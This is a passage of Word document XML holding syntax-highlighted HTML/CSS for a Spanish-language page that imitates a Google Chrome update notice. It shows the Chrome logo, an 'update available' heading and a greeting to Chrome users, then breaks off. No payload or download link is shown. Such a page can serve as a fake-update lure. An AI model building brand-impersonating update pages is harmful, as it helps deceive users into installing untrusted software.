          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="E06C75"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>px</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6273C480"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background-color: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>#4285f4</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E46560B"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color: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>#fff</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5F9AEB"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font-size: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>18</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="E06C75"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>px</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC708AE"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font-weight: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>bold</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A4D6D9"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text-align: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>center</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D3224A"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text-decoration: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>none</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D75A75"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border-radius: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="E06C75"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>px</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B611B9"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transition: background-color </w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>0.3</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="E06C75"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>ease</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED2AA2A"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D703CB"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w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>.button</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="56B6C2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>:hover</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB96A39"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xml:space="preserve">            background-color: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>#3367d6</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2CE0A0"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB244BF"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lt;/</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="E06C75"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>style</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B043F82"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lt;/</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="E06C75"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>head</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D053C44"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lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="E06C75"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>body</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE5AEAE"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lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="E06C75"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>div</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>"container"</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426B28F8"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lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="E06C75"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>img</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>"logo"</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>"https://www.google.com/chrome/static/images/chrome-logo.svg"</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>alt</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>"Chrome logo"</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240F9154"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lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="E06C75"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>h1</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>&gt;¡La última versión de Chrome ya está disponible!&lt;/</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="E06C75"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>h1</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04471830"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lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="E06C75"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>&gt;Estimado usuario de Chrome,&lt;/</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="E06C75"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
